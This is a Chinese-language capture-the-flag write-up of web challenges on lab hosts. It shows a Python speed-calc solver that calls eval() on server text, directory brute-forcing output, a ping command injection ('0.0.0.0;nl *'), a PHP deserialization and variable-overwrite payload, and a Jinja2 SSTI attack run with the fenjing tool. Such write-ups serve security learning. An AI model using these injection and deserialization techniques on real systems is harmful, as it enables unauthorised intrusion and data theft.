前言 抽象的比赛,不想再打第二次,What can i say
不过还是被队友带飞拿了全场第一
Web还是比较简单的
速算比赛 正则匹配算式,计算30次即可
import requestsimport reURL="http://10.1.127.10/" session = requests.Session() session_res = session.get(URL) cookie = session_res.cookies.get_dict() def get_answer (text ): match = re.search(r'Calculate:\s*(.*?)(?=<br>)' , text) if match : return eval (match .group(1 )) answer='' i=0 while True : res=session.post(URL, data={'answer' : answer}, cookies=cookie,timeout=2 ) if 'DAS' in res.text: print (res.text) break i = i + 1 answer = get_answer(res.text) print (f'第{i} 次 {answer} ' )
Popmart ┌──(mikannse㉿kali)-[~] └─$ gobuster dir -u http://10.1.127.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,txt,zip,rar,bak,pdf =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.1.127.11/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: pdf,php,txt,zip,rar,bak [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 499] /img (Status: 301) [Size: 308] [--> http://10.1.127.11/img/] /www.zip (Status: 200) [Size: 2294] /clear.php (Status: 200) [Size: 0] /audio (Status: 301) [Size: 310] [--> http://10.1.127.11/audio/] /css (Status: 301) [Size: 308] [--> http://10.1.127.11/css/] /js (Status: 301) [Size: 307] [--> http://10.1.127.11/js/] /config (Status: 200) [Size: 156] /flag.php (Status: 200) [Size: 0] /auth.php (Status: 200) [Size: 16] /fonts (Status: 301) [Size: 310] [--> http://10.1.127.11/fonts/] /load.php (Status: 200) [Size: 0] /server-status (Status: 403) [Size: 276]
www.zip 得到load.php源码,尝试文件上传,但是服务器权限不够无法新建目录
┌──(mikannse㉿kali)-[~] └─$ curl -X POST -F "upload_quwan=@/home/mikannse/1.jpeg" "http://10.1.127.11/load.php?action=mobile_upload_save" <br /> <b>Warning</b>: mkdir(): Permission denied in <b>/var/www/html/load.php</b> on line <b>63</b><br /> <br /> <b>Warning</b>: move_uploaded_file(/var/www/html/2321922613/1.jpg): failed to open stream: No such file or directory in <b>/var/www/html/load.php</b> on line <b>27</b><br /> <br /> <b>Warning</b>: move_uploaded_file(): Unable to move '/tmp/phpz8GSgw' to '/var/www/html/2321922613/1.jpg' in <b>/var/www/html/load.php</b> on line <b>27</b><br /> [1,"\/var\/www\/html\/2321922613\/1.jpg",2321922613,"1.jpg"]
转向index.php,赛中放出了提示,看来前面是一个Ping命令,可以进行命令拼接,但是有长度限制
输入0.0.0.0;nl *,能够读取当前目录的所有文件,重点是这个p0pmart.php,根据题目名也能猜到是这个反序列化
<?php error_reporting (0 );require_once ("flag.php" );class popmart public $yuki ; public $molly ; public $dimoo ; public function __construct ( $this ->yuki='tell me where' ; $this ->molly='dont_tell_you' ; $this ->dimoo="you_can_guess" ; } public function __wakeup ( global $flag ; global $where_you_go ; $this ->yuki=$where_you_go ; if ($this ->molly === $this ->yuki){ echo $flag ; } } } $pucky = $_GET ['wq' ];if (isset ($pucky )){ if ($pucky ==="二仙桥" ){ extract ($_POST ); if ($pucky ==="二仙桥" ){ die ("<script>window.alert('说说看,你要去哪??');</script>" ); } unserialize ($pucky ); } }
反序列化入口是传入的pucky,只要这个对象的molly和yuki值相同就输出flag
由$this->yuki=$where_you_go;和extract($_POST)可得
进行序列化
<?php class popmart public $yuki ; public $molly ='1' ; public $dimoo ; } $a = new popmart ();$b =serialize ($a );print $b ;?>
先get传参”二仙桥”访问,然后POST传参where_you_go=1&pucky=O:7:”popmart”:3:{s:4:”yuki”;N;s:5:”molly”;s:1:”1”;s:5:”dimoo”;N;}
实现pucky变量覆盖
Sai图片 首页找到/search路由,测试存在jinja2SSTI,fenjing一把梭
python -m fenjing scan --url=''
